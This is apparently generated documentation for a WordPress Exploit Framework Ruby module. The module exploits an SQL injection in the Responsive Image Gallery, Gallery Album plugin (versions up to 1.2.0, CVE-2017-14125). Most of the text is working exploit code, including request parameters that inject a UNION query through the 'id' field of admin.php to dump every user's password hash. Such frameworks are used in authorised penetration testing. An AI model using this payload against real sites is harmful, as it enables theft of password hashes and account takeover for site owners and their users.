class Wpxf::Auxiliary::GalleryAlbumHashDump

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 6
def initialize
  super

  update_info(
    name: 'Responsive Image Gallery, Gallery Album <= 1.2.0 Authenticated Hash Dump',
    desc: %(
      Responsive Image Gallery, Gallery Album <= 1.2.0 contains an SQL injection vulnerability
      which can be leveraged by all registered users with the permission
      to manage the plugin settings. This module utilises this vulnerability
      to dump the hashed passwords of all users in the database.
    ),
    author: [
      'Manuel Garcia Cardenas', # Disclosure
      'rastating'               # WPXF module
    ],
    references: [
      ['WPVDB', '8907'],
      ['CVE', '2017-14125'],
      ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/55']
    ],
    date: 'Sep 22 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 30
def check
  check_plugin_version_from_readme('gallery-album', '1.2.1')
end
hashdump_number_of_cols() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 54
def hashdump_number_of_cols
  4
end
hashdump_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 42
def hashdump_request_params
  {
    'page' => 'wpdevart_gallery_themes',
    'task' => 'add_edit_theme',
    'id' => "-#{Utility::Text.rand_numeric(3)} UNION #{hashdump_sql_statement}--"
  }
end
hashdump_visible_field_index() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 50
def hashdump_visible_field_index
  1
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 34
def requires_authentication
  true
end
reveals_one_row_per_request() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 38
def reveals_one_row_per_request
  true
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb, line 58
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin.php')
end